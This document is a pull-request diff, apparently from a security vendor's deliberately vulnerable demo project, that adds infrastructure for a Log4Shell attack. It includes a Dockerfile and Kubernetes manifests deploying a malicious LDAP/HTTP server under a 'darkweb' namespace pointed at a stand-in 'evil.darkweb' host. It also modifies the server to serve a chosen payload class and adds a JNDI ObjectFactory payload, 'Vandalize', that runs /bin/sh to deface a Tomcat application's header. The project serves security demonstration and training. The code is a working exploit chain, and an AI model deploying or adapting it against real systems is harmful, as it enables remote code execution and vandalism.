Merge pull request #369 from snyk-labs/log4shell

Log4shell

log4shell-goof/log4shell-server/Dockerfile

@@ -0,0 +1,11 @@
+FROM maven:3-jdk-8-slim as build
+COPY . .
+RUN --mount=target=$HOME/.m2,type=cache mvn clean compile assembly:single
+
+FROM openjdk:8 as ldap
+COPY --from=build target/*.jar /server.jar
+EXPOSE 8000
+EXPOSE 9999
+
+CMD ["java", "-jar", "/server.jar", "http://evil.darkweb:9999/#Vandalize", "8000", "9999", "Vandalize.class"]
+

log4shell-goof/log4shell-server/k8s/deploy.yaml

@@ -0,0 +1,53 @@
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: darkweb
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  labels:
+    app: log4shell
+  name: log4shell
+  namespace: darkweb
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: log4shell
+  template:
+    metadata:
+      labels:
+        app: log4shell
+    spec:
+      containers:
+        - name: ldap
+          image: ${DOCKER_ACCOUNT}/log4shell-server:latest
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: ldap
+  namespace: darkweb
+spec:
+  selector:
+    app: log4shell
+  ports:
+    - protocol: TCP
+      port: 80
+      targetPort: 8000
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: evil
+  namespace: darkweb
+spec:
+  selector:
+    app: log4shell
+  ports:
+    - protocol: TCP
+      port: 9999
+      targetPort: 9999
+

log4shell-goof/log4shell-server/k8s/imagebuild.sh

@@ -0,0 +1,9 @@
+#!/usr/bin/env bash
+read -e -i "${DOCKER_ACCOUNT}" -p "Please enter your DockerHub user/account name: " input
+name="${input:-$DOCKER_ACCOUNT}"
+
+echo "📦 Building image ${DOCKER_ACCOUNT}/log4shell-server:latest ..."
+docker build -t ${DOCKER_ACCOUNT}/log4shell-server:latest .
+echo
+echo "🚚 Pushing image to DockerHub..."
+docker push ${DOCKER_ACCOUNT}/log4shell-server:latest

log4shell-goof/log4shell-server/k8s/shutdown.sh

@@ -0,0 +1,4 @@
+#!/usr/bin/env bash
+MYDIR=$(dirname $0)
+echo "Removing app from kubernetes..."
+kubectl delete -f $MYDIR/deploy.yaml

log4shell-goof/log4shell-server/k8s/startup.sh

@@ -0,0 +1,14 @@
+#!/usr/bin/env bash
+MYDIR=$(dirname $0)
+read -e -i "${DOCKER_ACCOUNT}" -p "Please enter your DockerHub user/account name: " input
+name="${input:-$DOCKER_ACCOUNT}"
+
+cat $MYDIR/deploy.yaml | envsubst | kubectl apply -f -
+
+echo "⌚️ Waiting for pod deployment..."
+kubectl wait --namespace=darkweb \
+             --for=condition=ready pod \
+             --selector=app=log4shell \
+             --timeout=90s
+
+

log4shell-goof/log4shell-server/pom.xml

@@ -2,12 +2,7 @@
 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
   <modelVersion>4.0.0</modelVersion>
 
-  <parent>
-    <artifactId>log4shell-poc</artifactId>
-    <groupId>io.snyk</groupId>
-    <version>0.0.1-SNAPSHOT</version>
-  </parent>
-
+  <groupId>io.snyk</groupId>
   <artifactId>log4shell-server</artifactId>
   <version>0.0.1-SNAPSHOT</version>
 
@@ -37,4 +32,21 @@
       <version>2.2.13.Final</version>
     </dependency>
   </dependencies>
+  <build>
+    <plugins>
+      <plugin>
+        <artifactId>maven-assembly-plugin</artifactId>
+        <configuration>
+          <archive>
+            <manifest>
+              <mainClass>Server</mainClass>
+            </manifest>
+          </archive>
+          <descriptorRefs>
+            <descriptorRef>jar-with-dependencies</descriptorRef>
+          </descriptorRefs>
+        </configuration>
+      </plugin>
+    </plugins>
+  </build>
 </project>

log4shell-goof/log4shell-server/src/main/java/Server.java

@@ -24,13 +24,14 @@
 
 public  class  Server  {
     private  static  final String LDAP_BASE = "dc=example,dc=com" ;
-
+    private static String payloadClassname;
     public  static  void  main (String[] args) throws IOException, LDAPException {
-        String[] defaultArgs = {"http://127.0.0.1:8000/#Evil", "9999", "8000"};
+        String[] defaultArgs = {"http://127.0.0.1:8000/#Evil", "9999", "8000", "Evil.class"};
 
-        if (args.length != 3) {
+        if (args.length != 4) {
             args = defaultArgs;
         }
+        payloadClassname = args[3];
 
         setupLDAP(args[0], Integer.parseInt(args[1]));
         setupHTTP(Integer.parseInt(args[2]));
@@ -72,7 +73,7 @@ private static void setupHTTP(int port) throws IOException {
     }
 
     private static byte[] readEvil() throws IOException {
-        InputStream is = Server.class.getClassLoader().getResourceAsStream("Evil.class");
+        InputStream is = Server.class.getClassLoader().getResourceAsStream(payloadClassname);
         ByteArrayOutputStream bos = new ByteArrayOutputStream();
 
         int nRead;

log4shell-goof/log4shell-server/src/main/java/Vandalize.java

@@ -0,0 +1,16 @@
+import javax.naming.Context;
+import javax.naming.Name;
+import javax.naming.spi.ObjectFactory;
+import java.util.Hashtable;
+
+public class Vandalize implements  ObjectFactory  {
+    @Override
+    public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment)  throws Exception {
+        String[] cmd = {
+                "/bin/sh",
+                "-c",
+                "echo '<center><h1>Nice container you have, I think I will move in!</h1></center>' >> /usr/local/tomcat/webapps/todolist/WEB-INF/views/common/header.jspf"};
+        Runtime.getRuntime().exec(cmd);
+        return  null;
+    }
+}